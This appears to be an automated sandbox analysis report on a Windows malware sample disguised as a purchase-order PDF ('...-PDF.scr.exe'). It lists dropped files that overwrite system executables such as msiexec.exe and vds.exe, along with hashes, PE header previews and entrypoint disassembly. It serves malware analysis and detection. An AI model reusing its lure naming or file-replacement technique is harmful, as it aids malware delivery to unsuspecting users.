                                                                                                                                                                                                                                                                                                          MD5:882AAAB29114AA61C89B0726B6FA58A4
                                                                                                                                                                                                                                                                                                          SHA1:4AC00DED35C7CA1071E545F372A26E09C6C97726
                                                                                                                                                                                                                                                                                                          SHA-256:B43A42562D86A3A44944A30D58C951DA107AE6E6B93E9E0FBA66AE3EBE533DAC
                                                                                                                                                                                                                                                                                                          SHA-512:890903983A362DFC1172C09057DAD7B17254D0D88BA339834B99D728773A30A362043102FDE9EEC541F0C4E2297963542393D278884ACCE82AC5E10A8A1BBA04
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................F..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\Roaming\97dd988331e417df.bin

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):12320
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985788564928592
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:192:dUVUtyDfPxc7LqoNkbnaIGtEgL4V6zq392XnvvGRt4KyAfB:OWsBc/XRdEgL4IqN2XnHZKyg
                                                                                                                                                                                                                                                                                                          MD5:BEC8EA57B20D5D98E83CAF77F260812B
                                                                                                                                                                                                                                                                                                          SHA1:50D61F97315A0C59AAD28F2ED1678917FCA2A377
                                                                                                                                                                                                                                                                                                          SHA-256:968B21A145F02A294173B696EF9A4683D06067B110E54EB2CD8652DCD739FBDF
                                                                                                                                                                                                                                                                                                          SHA-512:FC723C6788565AF4E9541E05A41075AD610C8C1088EB32747DD98F8C52EAA6053AAEFD6515E7E69752E6C1F42C6E0FCB57DDFD0BBDFA7DC92F24D077FADF189D
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:.._....z:..I...ho.(.M#..LA...p............5.`I.s.F2.d<.....`v.*X..r./X...S.=p....x.?=.....?...aN'......-....3....Q....Qw.P4>z.L...8~by:cY].'..)i.....`...h..2..3...........Y.:khI'...../.@.Sq.klSj.HJ./..2T.h.L ^c.."..jK3y~.%.nd.D5r.c..7.h..r.'@)h`.\5.n.*6..@ ......22.....Y..1...,.=.#.0.n......~.....W..A).1.v..>...=Q.....o.e.;y.{J..*%g.....7&.u.+..-.....cwc.....;.Y..c[.:LJ...5?xm.Pc.!.$S9.u.R.....~}>'=.13.H...D`.P]..vAP5....d...S..o.....$MBk-a....3.....;...^...3.n...._....l.,>..%.QsO.;."Y.]Y......E+....ib.`......r..t.........j..:.r.e.2aG......De.ECB...x9..._.<$..M.@...Z....x.....2iv...0f.cu[.ff..L.\...+O..f..E9b.*..4I..BED...&I.G..:}..(.U-.k.: ...}m....:yz..........M.h.._.....z..;m.KP]......H..q....sm....V7......7...".C.........;..v./.Z...z.....>...W2....j..x...l.0...u.'.j..BFn<..^#i"...^.]@.._.....,.3...:.er....._...I~..H.vL...S...R."a...L.Pf..Cm....J......>.M.....(.\.I.......$.M.7..........F.'..Y?k.7..m...-..I...u..RNw..9I

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\msdtc.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1278464
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.142973799123246
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:gjkyOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gIyOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:46966EB01AA74C66C8C45009CAFCA510
                                                                                                                                                                                                                                                                                                          SHA1:A602134E9EBFE7A2C2ADA2A82DA1A66FD7C9159A
                                                                                                                                                                                                                                                                                                          SHA-256:C0112E3364E3C01F07CEFEA91CDFC793F16978C3B40DE134A10CBEDA7725EDBB
                                                                                                                                                                                                                                                                                                          SHA-512:17B1E1922CA59EBF52DD283B6F0C62FDD7E640EF77563FC7F79CD1C2C3FFD32AA81EB4A49624AE082643E45ACD2B1548A8DC21C52A8473EF5DAA0D506406D617
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................O..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\msiexec.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1199616
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.08387369690794
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:D4DAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:86D582B0ECF35EF636F3491BD428BDC5
                                                                                                                                                                                                                                                                                                          SHA1:CF151A189729808A417432D0C836B0A2E525BE48
                                                                                                                                                                                                                                                                                                          SHA-256:199719B3931CA4539B2FC8DA33D331350CFAEFC359610B6C60CF994FD6088F38
                                                                                                                                                                                                                                                                                                          SHA-512:CA5D4E47D3A41F4BA72FBAE454B63028C894F4B1F1169251F4309E0A856EB9DA3A8000BDC0B199238AC0FFE50B500F0FF4A04FAE0E9A9AEDA8B7D7F99C358A9A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.....................................A.... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\snmptrap.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1146880
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.027564530955829
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:c9sXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SssqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:7D3200FA5E7F0DAE65D4ECB41018A0E8
                                                                                                                                                                                                                                                                                                          SHA1:44E4C8D26492F56FCF16662D9644D696AA523594
                                                                                                                                                                                                                                                                                                          SHA-256:970093E047CDFE219D2979674FBFB97520AA2955E4056393F368F98F20C72515
                                                                                                                                                                                                                                                                                                          SHA-512:150048C1CDE6CA9C4BCA0CAC1D3C090C4AF3A2DACB7C395CE296036061FA3759646C4C192B4BDC25D2B5ED230BC19F16FD7056E9335B2BC0B53CB23D0C7C7D9F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................O..... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\vds.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1303552
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.1715434456254865
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:6Z0FxT1UoYr99GdcpK9sqjnhMgeiCl7G0nehbGZpbD:awWchDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:2EE227E57FDD41A436C3DE33802B4D02
                                                                                                                                                                                                                                                                                                          SHA1:A1C4268025E7FAF9578030BAEB9F3E8F0595A8E6
                                                                                                                                                                                                                                                                                                          SHA-256:AFFCED0E1A35D3F9D089CF5F53154201D3EBDB7461B48061E04C14D94E75E818
                                                                                                                                                                                                                                                                                                          SHA-512:4B59586059618118162BCBCD77DAA17BABD5699DF3E0651A964D407927FDD2A2FF86A7A83A7D33F2E2E35D4BC5515ED478A1F01F7DE0247DF745D0FE089CBC8D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@............ .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1339392
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.269280775353156
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:uyoKo2fRple9pWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:uyocJApWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:9A8EBFF61D4C0DF5B3817CC977D59B89
                                                                                                                                                                                                                                                                                                          SHA1:85777D55E313A6FF56AA05B7DD28FC57F28E3438
                                                                                                                                                                                                                                                                                                          SHA-256:2231F5BE7C7F04E6FA002C27760B2BED1B0D003D323BC94972C406CCC39AFBDB
                                                                                                                                                                                                                                                                                                          SHA-512:0A8C3CE9FE3D7B9CF33E83BA35B07A1BF6AC1D594AB6D83E4495D56798062C681C60C96147F5A5AC14293DF01322093A3CDFCD58AA653C45802C1635FC76B357
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@....................................!p.... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbengine.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2164736
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.062019463054502
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:lWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKODmg27RnWGj:V0zuNI6D527BWG
                                                                                                                                                                                                                                                                                                          MD5:21B54458FED133A5634A8ABCCB5B5220
                                                                                                                                                                                                                                                                                                          SHA1:638570CA2318C82D43F873DDB45AFA9CC528E538
                                                                                                                                                                                                                                                                                                          SHA-256:64B92A9774D23B9FB1B46706DCBD62D97D331BCDB89CDD29B23A28C34ECD9EF6
                                                                                                                                                                                                                                                                                                          SHA-512:5E5A9E4DF5B6A24FAB63F7A72D1916FFD38F622972CF044D483E3F08ACB14FEB0EC816EE363ECBA7B5EA92ECB2132CBB68B9CB099FDF50A3F8A1D13F6DC7BD80
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!......M!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.10018034009343514
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12:swlX6V/kqF69Fq5zzRm+X9O+pawHymQMlXf:u81+tO+pBHytk
                                                                                                                                                                                                                                                                                                          MD5:8CE2D116648DA5E165A1E0DF55D3F6F0
                                                                                                                                                                                                                                                                                                          SHA1:6825C96267E076DB4DC2F550B537A3BA19BCAE3F
                                                                                                                                                                                                                                                                                                          SHA-256:A9779496B4EBDB0F5039BE92CC3ADB6FF08D159A6D8E454F56803DC9D70F1191
                                                                                                                                                                                                                                                                                                          SHA-512:FCA6C7BA1689E65EA26973B3FD15DB964B8F958F0CD0CCF1FE060B05977863FC1C723C8F1A888159EFEE9D65B309C850160A307A04D17141F4775BEC944DA151
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:....`...`.......................................`...!...............................|....8.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W.................{............H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.....|....8.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.1014153971288612
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12:Vl6rcX6V/kqF69Fq5zzRgRl9X+pawHyIVcXX:Vl6v81HnX+pBHyIC
                                                                                                                                                                                                                                                                                                          MD5:B67C6BB081C4C63FA4AA94714D1BE095
                                                                                                                                                                                                                                                                                                          SHA1:6DDDCB22F8E75ED904B1EFDF41D1F36062B8EE5F
                                                                                                                                                                                                                                                                                                          SHA-256:9671A7F5EC877F8EC13157ED9E4AB525E4503CF93499D44DBEF9DC1A674528C8
                                                                                                                                                                                                                                                                                                          SHA-512:67FEE80517E74469B8F7F7BE7B74A5EE90B7CA89D86CDDA98B8A6A84C68638139899062337F8B898F39584FEE965871E5A2151B8AD7953EC616CB266B5166AA4
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:....h...h.......................................h...!...............................|....U.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W.................{............H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.....|....U.............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.09892701128127847
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12:uU9WlX69kqF69Fq5zzRD9I+pawHyvJ9WlXn:uUQ1yI+pBHyvJM
                                                                                                                                                                                                                                                                                                          MD5:93C58B2BCE84680AD78DB25FF856E5E5
                                                                                                                                                                                                                                                                                                          SHA1:2646597C86C97A48D9B82B865E0C1874FAC7D78F
                                                                                                                                                                                                                                                                                                          SHA-256:1C1DC661563EAE89A4B4E84900921D070E9B734B9A0C2F5C3CE7272675CE569C
                                                                                                                                                                                                                                                                                                          SHA-512:9C91ACBEC423E9707790E5C29822BBAA5675CCDA24E7E6A3A55DE3EBE80C687E90210A75237AF5927003B79E4AE1A363B97AC232C1FEA380EA54538BD3AB000A
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:....X...X.......................................X...!...............................|...g......................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............4C.{............H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.....|...g..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          \Device\Null

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):66
                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.524640141725149
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                                                                                                                                                                                                                          MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                                                                                                                                                                                                                          SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                                                                                                                                                                                                                          SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                                                                                                                                                                                                                          SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

                                                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.861093863784533
                                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                                                                                                                                                                                                          • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                          File name:PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                                                                                                                                                                                                                                                                                                          File size:6'536'429 bytes
                                                                                                                                                                                                                                                                                                          MD5:2940b15a52c0aaa97db24e4043ffffcf
                                                                                                                                                                                                                                                                                                          SHA1:fa29bd64c6fd9ca4811db98aa8608691cb0324c3
                                                                                                                                                                                                                                                                                                          SHA256:6cb077ac45cc280c1ace4f4b7f7ec0feb23487074ac50e0113ade7e9509dbb85
                                                                                                                                                                                                                                                                                                          SHA512:24303a2138d8a58bc501e24931d75fe9368db57a1f01244a90a6d580c9a8199547b734c31d8697e0b6912e5e829a0be1aa1c397f3b56bd9161e2c4736e1637c3
                                                                                                                                                                                                                                                                                                          SSDEEP:98304:r3v+7+QLirU/OpUYI+Lclg5xlmq4daschTJwEHjwxFD+z4N3vS:rf+6mir1e+Lci5xYLErTJPEFD+sN3vS
                                                                                                                                                                                                                                                                                                          TLSH:0766026472EAC128EFF27F3AC4D15119E170FC63E95A6A11A2FA77122677F800537782
                                                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                                                                          Icon Hash:22ecc8ececc8e4a7

                                                                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Entrypoint:0x416310
                                                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                          Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                          Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                                          call 00007F28C06E1C0Ch
                                                                                                                                                                                                                                                                                                          jmp 00007F28C06D59DEh
                                                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                          mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                                                                                                                                                          mov edi, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                                                                                                                                          mov edx, ecx
                                                                                                                                                                                                                                                                                                          add eax, esi
                                                                                                                                                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                                                                                                                                                          jbe 00007F28C06D5B6Ah
                                                                                                                                                                                                                                                                                                          cmp edi, eax
                                                                                                                                                                                                                                                                                                          jc 00007F28C06D5D0Ah
                                                                                                                                                                                                                                                                                                          cmp ecx, 00000100h
                                                                                                                                                                                                                                                                                                          jc 00007F28C06D5B81h
                                                                                                                                                                                                                                                                                                          cmp dword ptr [004A94E0h], 00000000h
                                                                                                                                                                                                                                                                                                          je 00007F28C06D5B78h
                                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                                          and edi, 0Fh
                                                                                                                                                                                                                                                                                                          and esi, 0Fh
                                                                                                                                                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                                                                                                          jne 00007F28C06D5B6Ah
                                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                                                                                                          pop ebp
                                                                                                                                                                                                                                                                                                          jmp 00007F28C06D5FCAh
                                                                                                                                                                                                                                                                                                          test edi, 00000003h
                                                                                                                                                                                                                                                                                                          jne 00007F28C06D5B77h
                                                                                                                                                                                                                                                                                                          shr ecx, 02h
                                                                                                                                                                                                                                                                                                          and edx, 03h
                                                                                                                                                                                                                                                                                                          cmp ecx, 08h
                                                                                                                                                                                                                                                                                                          jc 00007F28C06D5B8Ch
                                                                                                                                                                                                                                                                                                          rep movsd
                                                                                                                                                                                                                                                                                                          jmp dword ptr [00416494h+edx*4]
                                                                                                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                                                                                                                          mov edx, 00000003h
                                                                                                                                                                                                                                                                                                          sub ecx, 04h
                                                                                                                                                                                                                                                                                                          jc 00007F28C06D5B6Eh
                                                                                                                                                                                                                                                                                                          and eax, 03h
                                                                                                                                                                                                                                                                                                          add ecx, eax
                                                                                                                                                                                                                                                                                                          jmp dword ptr [004163A8h+eax*4]
                                                                                                                                                                                                                                                                                                          jmp dword ptr [004164A4h+ecx*4]
                                                                                                                                                                                                                                                                                                          nop
